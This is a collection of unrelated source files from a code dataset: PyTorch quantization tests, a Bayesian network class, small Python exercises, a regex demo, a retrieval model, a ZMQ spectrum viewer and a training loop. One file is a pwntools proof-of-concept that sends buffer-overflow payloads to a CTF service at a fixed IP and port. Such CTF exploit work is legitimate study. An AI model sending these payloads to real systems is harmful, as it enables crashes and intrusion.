torch.ones([1, 1, 1, 1])\n test_input2 = 2 * test_input1\n\n non_shared_mul_quantizer_id = NonWeightQuantizerId(\n InputAgnosticOperationExecutionContext.from_str(\"QuantizerLinkingTestModel/Path[path1]/__mul___0\"))\n\n non_shared_add_quantizer_id = NonWeightQuantizerId(\n InputAgnosticOperationExecutionContext.from_str(\"QuantizerLinkingTestModel/Path[path1]/__add___0\"))\n\n shared_quantizer_id = NonWeightQuantizerId(\n InputAgnosticOperationExecutionContext.from_str(\"QuantizerLinkingTestModel/Path[path2]/__add___0\"))\n\n non_shared_mul_quantizer = compression_ctrl.non_weight_quantizers[non_shared_mul_quantizer_id].quantizer_module_ref\n non_shared_add_quantizer = 
compression_ctrl.non_weight_quantizers[non_shared_add_quantizer_id].quantizer_module_ref\n shared_quantizer = compression_ctrl.non_weight_quantizers[shared_quantizer_id].quantizer_module_ref\n\n old_scale = 765.0 # so that the quantum is equal to 3\n with torch.no_grad():\n for quantizer in compression_ctrl.all_quantizations.values():\n quantizer.scale.fill_(old_scale)\n\n # Expected outputs without compression - 6, 12, 8. Scale deliberately set to preserve the values\n uncompressed_expected_outputs = (6.0 * torch.ones([1]), 12.0 * torch.ones([1]), 18.0 * torch.ones([1]))\n outputs_with_shared_scale_1 = compressed_model(test_input1, test_input2)\n\n for uncomp_out, comp_out_1 in zip(uncompressed_expected_outputs, outputs_with_shared_scale_1):\n assert torch.allclose(uncomp_out, comp_out_1)\n\n # Specifically clip the shared quantizer's outputs by setting scale to 1.0\n new_shared_scale = 1.0\n with torch.no_grad():\n shared_quantizer.scale.fill_(new_shared_scale)\n outputs_with_shared_scale_2 = compressed_model(test_input1, test_input2)\n\n # __add___0 outputs\n assert torch.allclose(outputs_with_shared_scale_2[0], 4.0 * torch.ones([1]))\n # __mul___0 outputs\n assert torch.allclose(outputs_with_shared_scale_2[1], 7.0 * torch.ones([1]))\n # __add___1 outputs\n assert torch.allclose(outputs_with_shared_scale_2[2], 12.0 * torch.ones([1]))\n\n # Clipping the non-shared quantizers at the same position in the path as the two shared ones\n # in the same manner is required to simulate the same grad input for both the shared quantizers\n # and the unshared ones\n with torch.no_grad():\n non_shared_mul_quantizer.scale.fill_(new_shared_scale)\n non_shared_add_quantizer.scale.fill_(new_shared_scale)\n final_output = compressed_model(test_input1, test_input2)[2]\n final_output.backward()\n\n assert torch.allclose(shared_quantizer.scale.grad,\n non_shared_mul_quantizer.scale.grad + non_shared_add_quantizer.scale.grad)\n\n\ndef test_unified_scales_for_vpu():\n nncf_config = get_quantization_config_without_range_init(model_size=1)\n nncf_config[\"compression\"][\"quantize_outputs\"] = True\n nncf_config[\"input_info\"] = [\n {\n \"sample_size\": [1, 1, 1, 1],\n },\n {\n \"sample_size\": [1, 1, 1, 1],\n }\n ]\n nncf_config[\"target_device\"] = \"VPU\"\n\n _, compression_ctrl = create_compressed_model_and_algo_for_test(QuantizerLinkingTestModel(),\n nncf_config)\n\n assert len(compression_ctrl.non_weight_quantizers) == 2\n\n total_quantizations = sum(\n [len(info.affected_insertions) for info in compression_ctrl.non_weight_quantizers.values()])\n assert total_quantizations == 8\n\n\nclass SimplerModelForUnifiedScalesTesting(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.conv2d_1 = torch.nn.Conv2d(1, 1, 1)\n self.conv2d_2 = torch.nn.Conv2d(1, 1, 1)\n self.conv2d_3 = torch.nn.Conv2d(1, 1, 1)\n self.conv2d_4 = torch.nn.Conv2d(1, 1, 1)\n\n def forward(self, x):\n in_1, in_2 = x.chunk(dim=-1, chunks=2)\n in_1 = self.conv2d_1(in_1)\n in_2 = self.conv2d_2(in_2)\n x = in_1 + in_2\n x = torch.cat([x, x], dim=-1)\n in_1, in_2 = x.chunk(dim=-1, chunks=2)\n in_1 = self.conv2d_3(in_1)\n in_2 = self.conv2d_4(in_2)\n x = in_1 * in_2\n return x\n\n\ndef test_unified_scales_are_identical_in_onnx(tmp_path):\n # pylint:disable=no-member\n nncf_config = get_quantization_config_without_range_init(model_size=1)\n nncf_config[\"compression\"][\"quantize_outputs\"] = True\n nncf_config[\"input_info\"] = [\n {\n \"sample_size\": [1, 1, 1, 2],\n },\n ]\n nncf_config[\"target_device\"] = \"VPU\"\n\n 
compressed_model, compression_ctrl = create_compressed_model_and_algo_for_test(\n SimplerModelForUnifiedScalesTesting(),\n nncf_config)\n\n with torch.no_grad():\n for quant_info in compression_ctrl.non_weight_quantizers.values():\n if isinstance(quant_info.quantizer_module_ref, AsymmetricQuantizer):\n quant_info.quantizer_module_ref.input_range *= torch.abs(\n torch.rand_like(quant_info.quantizer_module_ref.input_range))\n else:\n quant_info.quantizer_module_ref.scale *= torch.abs(\n torch.rand_like(quant_info.quantizer_module_ref.scale))\n\n test_input1 = torch.ones([1, 1, 1, 2])\n compressed_model.forward(test_input1)\n\n onnx_path = tmp_path / \"model.onnx\"\n compression_ctrl.export_model(onnx_path)\n\n onnx_model = onnx.load(onnx_path)\n\n def get_fq_nodes(onnx_model: onnx.ModelProto) -> List[onnx.NodeProto]:\n retval = []\n for node in onnx_model.graph.node:\n if str(node.op_type) == \"FakeQuantize\":\n retval.append(node)\n return retval\n\n def immediately_dominates_add_or_mul(node: onnx.NodeProto, graph: onnx.GraphProto) -> bool:\n if len(node.output) != 1:\n return False\n output_tensor_id = node.output[0]\n matches = [x for x in graph.node if output_tensor_id in x.input]\n for match in matches:\n if match.op_type in [\"Add\", \"Mul\"]:\n return True\n return False\n\n def get_successor(node: onnx.NodeProto, graph: onnx.GraphProto) -> onnx.NodeProto:\n assert len(node.output) == 1 # Only single-output nodes are supported in this func\n for target_node in graph.node:\n if node.output[0] in target_node.input:\n return target_node\n return None\n\n def group_nodes_by_output_target(nodes: List[onnx.NodeProto], graph: onnx.GraphProto) -> List[List[onnx.NodeProto]]:\n output_nodes = {} # type: Dict[str, List[onnx.NodeProto]]\n for node in nodes:\n target_node_name = get_successor(node, graph).name\n if target_node_name not in output_nodes:\n output_nodes[target_node_name] = []\n output_nodes[target_node_name].append(node)\n return list(output_nodes.values())\n\n def resolve_constant_node_inputs_to_values(node: onnx.NodeProto, graph: onnx.GraphProto) -> \\\n Dict[str, onnx.AttributeProto]:\n retval = {}\n for input_ in node.input:\n constant_input_nodes = [x for x in graph.node if input_ in x.output and x.op_type == \"Constant\"]\n for constant_input_node in constant_input_nodes:\n assert len(constant_input_node.attribute) == 1\n val = constant_input_node.attribute[0]\n retval[input_] = numpy_helper.to_array(val.t)\n return retval\n\n fq_nodes = get_fq_nodes(onnx_model)\n eltwise_predicate = partial(immediately_dominates_add_or_mul, graph=onnx_model.graph)\n eltwise_fq_nodes = list(filter(eltwise_predicate, fq_nodes))\n fq_nodes_grouped_by_output = group_nodes_by_output_target(eltwise_fq_nodes, onnx_model.graph)\n\n for unified_scale_group in fq_nodes_grouped_by_output:\n inputs = [resolve_constant_node_inputs_to_values(fq_node, onnx_model.graph) for fq_node in unified_scale_group]\n for inputs_dict in inputs[1:]:\n curr_values = list(inputs_dict.values())\n ref_values = list(inputs[0].values())\n assert curr_values == ref_values # All inputs for unified scale quantizers must be equal\n","sub_path":"tests/quantization/test_unified_scales.py","file_name":"test_unified_scales.py","file_ext":"py","file_size_in_byte":34266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"212025220","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport matplotlib.pyplot as 
plt\nimport numpy as np\nfrom tools import *\nimport operator\nimport itertools\n\nclass diagnet(nn.Module):\n    def __init__(self,opt):\n        super(diagnet, self).__init__()\n        self.feature_dim=opt['feature_dim']\n        self.final_weight_dim=opt['feature_dim']*10\n        self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n        self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n        self.fc1 = nn.Linear(320, 100)\n        self.fc2 = nn.Linear(100, self.feature_dim)\n        self.device=opt['device']\n        self.if_cuda=opt['if_cuda']\n\n\n        self.prior_mu=torch.zeros(self.final_weight_dim, requires_grad=False)\n        self.prior_diag=torch.ones(self.final_weight_dim, requires_grad=False)\n\n        self.q_mu=torch.randn(self.final_weight_dim, requires_grad=True)\n        self.q_diag=torch.ones(self.final_weight_dim, requires_grad=True)\n\n        params = list(self.parameters()) + [self.q_mu,self.q_diag]\n        self.optimizer = optim.Adam(params, lr=opt['optimizer_lr'])\n        self.feature_optimizer = optim.Adam(self.parameters(), lr=0.001)\n        self.final_optimizer = optim.Adam([ self.q_mu, self.q_diag ], lr=0.001)\n\n    def forward(self, x, final_weight):\n        x=x.view(-1,1,28,28)\n        x = F.relu(F.max_pool2d(self.conv1(x), 2))\n        x = F.relu(F.max_pool2d(self.conv2(x), 2))\n        x = x.view(-1, 320)\n        x = F.relu(self.fc1(x))\n        x = torch.tanh(self.fc2(x))\n        x = torch.matmul(x,final_weight)\n        return F.log_softmax(x,dim=-1)\n\n\n    def feature_forward(self, x ):\n        x=x.view(-1,1,28,28)\n        x = F.relu(F.max_pool2d(self.conv1(x), 2))\n        x = F.relu(F.max_pool2d(self.conv2(x), 2))\n        x = x.view(-1, 320)\n        x = F.relu(self.fc1(x))\n        x = torch.tanh(self.fc2(x))\n        return x\n\n    def predict(self,x):\n        with torch.no_grad():\n            eps=torch.randn([100,self.final_weight_dim]).to(self.device)\n            final_weight_samples=(torch.sqrt(self.q_diag.to(self.device)).repeat(100).view(100,self.final_weight_dim)*eps+self.q_mu.to(self.device)).view(100,self.feature_dim,10).permute(0, 2, 1)\n            feature_of_data=self.feature_forward(x)\n            prediction=(torch.mean(torch.softmax((final_weight_samples@feature_of_data.t()).permute(2, 0, 1),dim=-1),1).data.max(dim=1, keepdim=True)[1]).view(-1)\n            return prediction\n\n\n    def test(self,x,label):\n        with torch.no_grad():\n            eps=torch.randn([100,self.final_weight_dim]).to(self.device)\n            final_weight_samples=(torch.sqrt(self.q_diag.to(self.device)).repeat(100).view(100,self.final_weight_dim)*eps+self.q_mu.to(self.device)).view(100,self.feature_dim,10).permute(0, 2, 1)\n            feature_of_data=self.feature_forward(x)\n            pred=(torch.mean(torch.softmax((final_weight_samples@feature_of_data.t()).permute(2, 0, 1),dim=-1),1).data.max(dim=1, keepdim=True)[1]).view(-1)\n            accuracy=(pred == label).sum().item()/label.size(0)\n            return accuracy\n\n\n\n    def predictive_distribution_entropy_batch(self,x, sample_num=100):\n        with torch.no_grad():\n            eps=torch.randn([sample_num,self.final_weight_dim]).to(self.device) ### 100*200\n            final_weight_samples=(torch.sqrt(self.q_diag.to(self.device)).repeat(sample_num).view(sample_num,self.final_weight_dim)*eps+self.q_mu.to(self.device)).view(sample_num,self.feature_dim,10).permute(0, 2, 1)\n            feature_of_data=self.feature_forward(x)### 70*20\n\n            output_logit=F.log_softmax((final_weight_samples@feature_of_data.t()).permute(2,0,1),dim=-1) ###70*100*10\n\n            eps=torch.randn([sample_num,self.final_weight_dim]).to(self.device)\n            final_weight_samples=(torch.sqrt(self.q_diag.to(self.device)).repeat(sample_num).view(sample_num,self.final_weight_dim)*eps+self.q_mu.to(self.device)).view(sample_num,self.feature_dim,10).permute(0, 2, 1)\n            feature_of_data=self.feature_forward(x)\n            output_probs=F.softmax((final_weight_samples@feature_of_data.t()).permute(2,0,1),dim=-1) 
###70*100*10\n            output_dis_for_sample=sample_from_batch_categorical_multiple(output_logit,sample_num=30,cuda=self.if_cuda).view(x.size(0),-1) ### 70*100*30\n            output_dis_for_sample_one_hot=one_hot_embedding(output_dis_for_sample, 10, cuda=self.if_cuda) ### 70*3000*10\n            output_probs=output_probs@output_dis_for_sample_one_hot.permute(0,2,1) ### 70*100*3000\n            entropy_list=-torch.mean(torch.log(torch.mean(output_probs,dim=1)),dim=-1)\n            return entropy_list\n\n\n\n    def online_train(self,x,label,sample_num=100):\n        train_losses = []\n        total_size=x.size(0)\n        curr_prior_mu = self.q_mu.clone().detach()\n        curr_prior_diag= self.q_diag.clone().detach()\n        correct_flag=0\n\n        while correct_flag<5:\n            self.final_optimizer.zero_grad()\n            eps=torch.randn([sample_num,self.final_weight_dim]).to(self.device)\n            final_weight_samples=(torch.sqrt(self.q_diag).repeat(sample_num).view(sample_num,self.final_weight_dim)*eps+self.q_mu).view(sample_num,self.feature_dim,10).permute(0, 2, 1)\n            feature_of_data=self.feature_forward(x)\n            output=torch.mean(F.log_softmax((final_weight_samples@feature_of_data.t()).permute(0, 2, 1),dim=-1),0)\n            nll_loss= F.nll_loss(output,label,reduction='sum')\n            kl=KL_diag_gaussian(self.q_mu,self.q_diag,curr_prior_mu,curr_prior_diag)\n            neg_elbo=kl+nll_loss\n            neg_elbo.backward()\n            self.final_optimizer.step()\n            train_losses.append(neg_elbo.item())\n\n\n            if output.data.max(dim=1, keepdim=True)[1].item()==label.item():\n                correct_flag+=1\n            else:\n                correct_flag=0\n            print(output.data.max(dim=1, keepdim=True)[1].item())\n#        plt.plot(train_losses)\n#        plt.show()\n\n\n\n    def train(self,x,label):\n        train_losses = []\n        if x.size(0)<100:\n            batch_size=x.size(0)\n            iteration=1\n        else:\n            batch_size=100\n            iteration=int(x.size(0)/batch_size)\n        for epoch in range(0,3000):\n            for it in range(0,iteration):\n                index=np.random.choice(x.size(0),batch_size)\n                self.optimizer.zero_grad()\n                eps=torch.randn([self.final_weight_dim]).to(self.device)\n                final_weight_sample= (self.q_mu.to(self.device)+eps*torch.sqrt(self.q_diag.to(self.device))).view(self.feature_dim,10)\n                output = self.forward(x[index],final_weight_sample)\n                nll_loss= F.nll_loss(output,label[index],reduction='sum')*(float(x.size(0))/float(batch_size))\n                kl=KL_diag_gaussian(self.q_mu.to(self.device),self.q_diag.to(self.device),self.prior_mu.to(self.device),self.prior_diag.to(self.device))\n                neg_elbo=kl+nll_loss\n                neg_elbo.backward()\n                self.optimizer.step()\n                train_losses.append(neg_elbo.item())\n        return train_losses\n","sub_path":".ipynb_checkpoints/diagnet-checkpoint.py","file_name":"diagnet-checkpoint.py","file_ext":"py","file_size_in_byte":7055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"25524374","text":"##\n## Programming in Python\n## ===========================================================================\n##\n## Generate a list of tuples, where each tuple contains in its first \n## position the value of the second column; the second part of the \n## tuple is a list with the letters (sorted, with no letter repeated) \n## of the first column that appear associated with that value of the \n## second column. 
That is:\n##\n## Answer:\n## ('0', ['C'])\n## ('1', ['A', 'B', 'D', 'E'])\n## ('2', ['A', 'D', 'E'])\n## ('3', ['A', 'B', 'D', 'E'])\n## ('4', ['B', 'E'])\n## ('5', ['B', 'C', 'D', 'E'])\n## ('6', ['A', 'B', 'C', 'E'])\n## ('7', ['A', 'C', 'D', 'E'])\n## ('8', ['A', 'B', 'E'])\n## ('9', ['A', 'B', 'C', 'E'])\n##\n## >>> Write your code from this point on <<<\n##\n\n# Read the file, strip the line endings and split on tabs\ndatos = open('data.csv','r').readlines()\ndatos = [r.replace('\\n','') if r[-1] == '\\n' else r for r in datos]\ndatos = [r.split('\\t') for r in datos]\n\n# Take the first two columns\nletras = [r[0:2] for r in datos]\n\n# Build a dictionary, adding each one of the letters \ndicc = {}\nfor letra, valor in letras:\n    if valor in dicc.keys():\n        if not letra in dicc[valor]:\n            dicc[valor] = dicc[valor] + [letra]\n            dicc[valor].sort()\n    else:\n        dicc[valor] = [letra]\n\n# Generate the list\nlista = []\nfor k in sorted(dicc.keys()):\n    tupla = (k,dicc[k])\n    lista += [(k,dicc[k])]\n    print(tupla)\n\n","sub_path":"03-python=1/q08=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"77172884","text":"import re, sys\nimport colorama as cm\nisVerbose=0\n\n\ndef matchRE(pat, desc=''):\n    if 1: \n        print(\"  %s\\t%s\" % (pat, desc) )\n    else:\n        if isVerbose: print(\"pat: %s\" % pat)\n\n    s='to be or not really to be'\n\n    mo = re.search(pat, s, flags=0)\n    if isVerbose: print('matchObj:', mo)\n\n    if isVerbose: print(s)\n\n    if mo is None:\n        print(\"no match at all.\")\n        return #exit(0) # actually, success-exit-code is 0 :-/\n\n    left = s[ : mo.span()[0] ]\n    hilit = mo.group() \n    right = s[ mo.span()[1] : ]\n\n    a = (\n        cm.Back.BLACK\n        +cm.Fore.WHITE + left \n        +cm.Back.GREEN+cm.Fore.LIGHTGREEN_EX + hilit \n        +cm.Back.BLACK +cm.Fore.WHITE + right \n        +\"\\n\"\n        )\n\n    if 0:\n        print(a)\n    else:\n        sys.stdout.write(a)\n\n\n\ndef Main():\n    cm.init() #convert=True)\n    if len(sys.argv)==2:  # regx.py \"hej \\\"med\\\" dig\"\n        pat = sys.argv[1]\n        matchRE(pat)\n    else:\n        parts = [\n            ['be', 'simple sequence'],\n            ['be.*be','kleene star'],\n            ['^to.*or', 'start-of-line'],\n            ['not.*be$', 'end-of-line'],\n            ['.', 'any single char'],\n            ['[^ot]', 'any char NOT in class'],\n            ['al*y', 'zero or more'],\n            ['[nt]o+', 'one or more'],\n            ['al?', 'at most one'],\n            ['l{2}', 'exactly 2'],\n            ['l{1,3}', 'btw 1-3'],\n            ['not|be', 'or'],\n            ['(n.*t)', 'capture'],\n            ['(?:not).*(to).*(?:be)', 'non-capture'],\n            ['(?:not).*(\\w+).*(?:be)', 'word'],\n            ['(?:not).*(\\s+).*(?:be)', 'space'],\n        ]\n        for (a,b) in parts:\n            matchRE(a,b)\n\nMain()\n","sub_path":"regex/regx.py","file_name":"regx.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"43771837","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov  2 23:02:20 2017\n\n@author: shen\n\"\"\"\n\n#!/usr/bin/env python\n\n\"\"\"The simplest TF-IDF library imaginable.\nAdd your documents as two-element lists `[docname,\n[list_of_words_in_the_document]]` with `addDocument(docname, list_of_words)`.\nGet a list of all the `[docname, similarity_score]` pairs relative to a\ndocument by calling `similarities([list_of_words])`.\nSee the README for a usage example.\n\"\"\"\nimport math\nclass QLM:\n    def __init__(self):\n        self.weighted = False\n        self.documents = {}\n        self.corpus_dict = {}\n        self.sims = {}\n        self.a = 0.5\n    def 
add_document(self, doc_name, list_of_words):\n        # building a dictionary\n        doc_dict = {}\n        for w in list_of_words:\n            doc_dict[w] = doc_dict.get(w, 0.) + 1.0\n        # the count of every word has been computed\n        length = float(len(list_of_words))\n        # turn counts into frequencies (divide by the document's word count)\n        for k in doc_dict:\n            doc_dict[k] = doc_dict[k] / length\n            # one alternative: doc_dict[k] = 1 + doc_dict[k] / length\n        # QLM does not seem to need the full corpus vocabulary\n        self.documents[doc_name]= doc_dict\n    def likelihood(self, list_of_words, queryName):\n        \"\"\"Returns a list of all the [docname, similarity_score] pairs relative to a\nlist of words.\n        \"\"\"\n\n        # building the query dictionary\n        #print(self.corpus_dict)\n        query_dict = {}\n        for w in list_of_words:\n            if query_dict.get(w,0)==0:\n                query_dict[w] = query_dict.get(w, 0.0) + 1.0\n        \"\"\" test for query_dict\n        for w in query_dict:\n            print(w)\n        \"\"\"\n        # computing the list of similarities\n        QLMDic = {}\n        for doc in self.documents:\n            # things to do for every document:\n            #1. read out its name and its dictionary\n            #2. for each query term, check whether it occurs in the document; if it does, accumulate that term's (smoothed) probability, otherwise skip it, keeping the result in a temporary value\n            #3. put the final accumulated likelihood into QLMDic together with the doc name\n            #4. sort QLMDic \n            \n            queryLikelihood= 0.0\n            #1 get this document's dictionary {}\n            dicTemp = self.documents[doc]\n            \n            #2.\n            for w in query_dict:\n                queryLikelihood = math.log(self.a*dicTemp.get(w,0.0)+(1-self.a)*float(self.corpus_dict[str(int(w))]))+queryLikelihood\n            \n            \n            #3.\n            \n            QLMDic[doc] = queryLikelihood\n            \n        #4. \n        self.sims[queryName] = sorted(QLMDic.items(), key=lambda d:d[1], reverse = True)\n        # sorted in descending order \n        ","sub_path":"QLModel.py","file_name":"QLModel.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"525995910","text":"import common\nimport glob\nimport shutil\nimport os\n\n\ndef getUserDataFolders():\n    if not common.Globals.IS_WINDOWS:\n        return None\n\n    import winreg\n\n    try:\n        defaultSteamPath = winreg.QueryValueEx(\n            winreg.OpenKey(winreg.HKEY_CURRENT_USER, r\"Software\\Valve\\Steam\"),\n            \"SteamPath\",\n        )[0]\n        return glob.glob(\n            os.path.join(defaultSteamPath, \"userdata\", \"**\", \"config\"), recursive=True\n        )\n    except:\n        return None\n\n\ndef extractSteamGrid():\n    try:\n        userDataFolders = getUserDataFolders()\n        if userDataFolders:\n            for i in userDataFolders:\n                shutil.unpack_archive(\"higumi-steamgrid.zip\", i)\n    except:\n        pass\n","sub_path":"steamGridExtractor.py","file_name":"steamGridExtractor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"323545526","text":"# https://www.geeksforgeeks.org/power-set/amp/\n\ndef powerset(arr, n):\n    size = 2 ** n\n\n    for i in range(size):\n        for j in range(n):\n            if i & (1 << j) > 0:\n                print(arr[j], end='')\n        print()\n\n\narr = ['A', 'B', 'C']\npowerset(arr, 3)","sub_path":"dp/powerset.py","file_name":"powerset.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"65488008","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\nH2HC application created for a CTF\nExploit written by M4v3r1ck (helvio_junior[at]hotmail[dot]com)\n'''\n\nfrom pwn import *\nimport os\n \ncontext(arch='amd64', os='windows', log_level='debug')\n\nhost= \"192.168.255.201\"\nport = 54345\n\n# Stage 1\nlog.info(\"Sending stage 1\")\npayload1 = \"H2HC\" #cookie \npayload1 += \"\\xff\\x00\\x00\\x00\" #size to trigger the vuln\npayload1 += \"\\x41\" * 0xff\npayload1 += \"\\n\"\n\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\n\n# Stage 2\nlog.info(\"Sending stage 
2\")\npayload2 = \"H2HC\" \npayload2 += \"\\x05\\x00\\x00\\x00\" \npayload2 += \"A\" * 0x100\npayload2 += \"\\x04\\x03\\x02\\x01\" \npayload2 += \"B\" * 36 \npayload2 += \"\\x08\\x07\\x06\\x05\"\n\np2 = remote(host, port)\np2.send(payload2)\np2.recv(40960)\np2.close()\n\n","sub_path":"2019_H2HC/exploit/01_poc.py","file_name":"01_poc.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"22979835","text":"# This is a sketch of how a popepipe_zmq<->spec interface\n# would work\n# it is not functional\n\nimport zmq\nimport numpy as np\nimport time\nimport mass\nPORT = 2015\n\ntry:\n import PyQt5\n use_pyqt5=True\nexcept:\n use_pyqt5=False\n\nif use_pyqt5:\n print(\"using PyQt5\")\n from PyQt5 import QtGui ,QtCore, uic\n from PyQt5.QtCore import pyqtSlot\n from PyQt5.QtWidgets import (QApplication, QWidget, QFileDialog, QSizePolicy, QVBoxLayout, QTextEdit,QCheckBox)\n from PyQt5.QtGui import QFont\n from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nelse:\n print(\"failed to import PyQt5, trying PyQt4\")\n from PyQt4 import QtGui ,QtCore, uic\n from PyQt4.QtCore import pyqtSlot, QTimer\n from PyQt4.QtGui import (QApplication, QWidget, QFileDialog, QSizePolicy, QVBoxLayout, QTextEdit,QCheckBox)\n from PyQt4.QtGui import QFont\n from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\n\n\nimport os, sys, h5py\nimport numpy as np\nimport pylab as plt\nfrom matplotlib.figure import Figure\nfrom mass.core.files import LJHFile\nimport mass\nimport argparse\n\nparser = argparse.ArgumentParser(description='A work in progress program to display a live spectrum.',\n epilog=\"\"\"WARNING, PROBABLY NEEDS WORK ON CUTS\"\"\")\nparser.add_argument('calibrationpath', help='path of a mass hdf5 file containing calibration info')\nargs = vars(parser.parse_args())\n\n\nclass MplCanvas(QWidget):\n def __init__(self, parent = None, width=6, height=5, dpi=100):\n QWidget.__init__(self, parent)\n self.fig = Figure(figsize=(width,height), dpi=dpi)\n # self.fig = Figure()\n self.canvas = FigureCanvas(self.fig)\n FigureCanvas.__init__(self.canvas, self.fig)\n self.axes = self.fig.add_subplot(111)\n self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)\n self.canvas.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)\n self.canvas.updateGeometry()\n self.mpl_toolbar = NavigationToolbar(self.canvas, self)\n self.vbl = QVBoxLayout()\n self.vbl.addWidget(self.mpl_toolbar)\n self.vbl.addWidget(self.canvas)\n self.setLayout(self.vbl)\n\n\n def clear(self): self.axes.clear()\n def plot(self, *args, **kwargs): return self.axes.plot(*args, **kwargs)\n def set_xlabel(self, *args, **kwargs): return self.axes.set_xlabel(*args, **kwargs)\n def set_ylabel(self, *args, **kwargs): return self.axes.set_ylabel(*args, **kwargs)\n def set_title(self, *args, **kwargs): return self.axes.set_title(*args, **kwargs)\n def set_yscale(self,*args, **kwargs): return self.axes.set_yscale(*args, **kwargs)\n def legend(self, *args, **kwargs): return self.axes.legend(*args, **kwargs)\n def mpl_connect(self, *args, **kwargs): return self.canvas.mpl_connect(*args, **kwargs)\n def draw(self, *args, **kwargs): return self.canvas.draw(*args, **kwargs)\n def onpick(self, event):\n 
print(\"default pick_event handler for MplCanvas\")\n print(event.artist)\n print(event.ind)\n\n\nctx = zmq.Context() # context is required to create zmq socket\nsocket = zmq.Socket(ctx, zmq.SUB) # make a subscriber socket\nsocket.connect (\"tcp://localhost:%s\" % PORT) # connect to the server\nsocket.set_hwm(10000) # set the recieve side message buffer limit\nsocket.setsockopt(zmq.SUBSCRIBE, \"\") # subscribe to all message, since all start with \"\"\n# define a dtype to match the julia type\ndtype_MassCompatibleDataProductFeb2017=np.dtype([(\"filt_value\",\"f4\"),(\"filt_phase\",\"f4\"),(\"timestamp\",\"f8\"),(\"rowcount\",\n\"i8\"),(\"pretrig_mean\",\"f4\"),(\"pretrig_rms\",\"f4\"),(\"pulse_average\",\"f4\"),(\"pulse_rms\",\"f4\"),\n(\"rise_time\",\"f4\"),(\"postpeak_deriv\",\"f4\"),(\"peak_index\",\"u2\"),(\"peak_value\",\"u2\"),(\"min_value\",\"u2\")])\n\n\nclass CalFile():\n def __init__(self, filename):\n self.h5 = h5py.File(filename,\"r\")\n print(self.h5)\n\n def get_hdf5_group(self,ch):\n return self.h5[\"chan\"+str(ch)][\"calibration\"]\n\n def get_calibration(self,ch):\n hdf5_group = self.get_hdf5_group(ch)\n return mass.EnergyCalibration.load_from_hdf5(hdf5_group,\"p_filt_value\")\n\n def isbad(self,ch):\n return \"why_bad\" in self.h5[\"chan\"+str(ch)].attrs\n\n\ndef apply_calibration(payload, ch, info):\n cal=info[ch][2]\n return cal(payload[\"filt_value\"])\n\ndef iscut(payload, ch, info):\n info_ch = info[ch]\n pt_lo,pt_hi = info_ch[0]\n md_lo,md_hi = info_ch[1]\n v=payload[\"filt_value\"]\n return pt_lo= e1 and epoch <= e2:\n alpha = alpha_max*(epoch-e1)/(e2-1)\n \n for i, data in enumerate(train_loader, 0):\n \n \n \n #Get inputs\n #Wrap them in a Variable object\n if self.gpu_mode:\n input_seg, label_seg = torch.as_tensor(data[1]['image'], dtype=torch.float).cuda() ,torch.as_tensor(data[1]['segment'], dtype=torch.float).cuda()\n input_adv = torch.as_tensor(data[0]['image'], dtype=torch.float).cuda()\n label_adv = torch.as_tensor(data[0]['source'], dtype=torch.float).cuda()\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n else:\n input_seg, label_seg = torch.as_tensor(data[1]['image'], dtype=torch.float) ,torch.as_tensor(data[1]['segment'], dtype=torch.float)\n input_adv = torch.as_tensor(data[0]['image'], dtype=torch.float)\n label_adv = torch.as_tensor(data[0]['source'], dtype=torch.float)\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n \n #Set the parameter gradients to zero\n \n for k in range(2):\n #optimizer_seg.zero_grad()\n #optimizer_adv.zero_grad()\n if k == 0 :\n optimizer_adv.zero_grad()\n \n output_dis = adv(seg(input_adv)[1])\n loss_discriminator = loss_dis(output_dis[0],label_adv)\n \n loss_discriminator.backward()\n optimizer_adv.step()\n running_loss_dis += loss_discriminator.item()\n total_train_loss_dis += loss_discriminator.item()\n loss_adv_value =loss_discriminator.item()\n if output_dis[0].argmax() == label_adv.argmax():\n G+=1\n else:\n F+=1\n \n if k == 1 :\n optimizer_seg.zero_grad()\n output_seg = seg(input_seg)[0]\n loss_adversarial = loss_seg_adv(loss_adv_value,output_seg,label_seg,alpha)\n loss_adversarial.backward()\n optimizer_seg.step()\n running_loss += loss_adversarial.item()\n total_train_loss += loss_adversarial.item()\n \n \n #Forward pass, backward pass, optimize\n \n \n #print(list(net.parameters())[0].grad.mean())\n \n #Print statistics\n\n \n #Print every 10th batch 
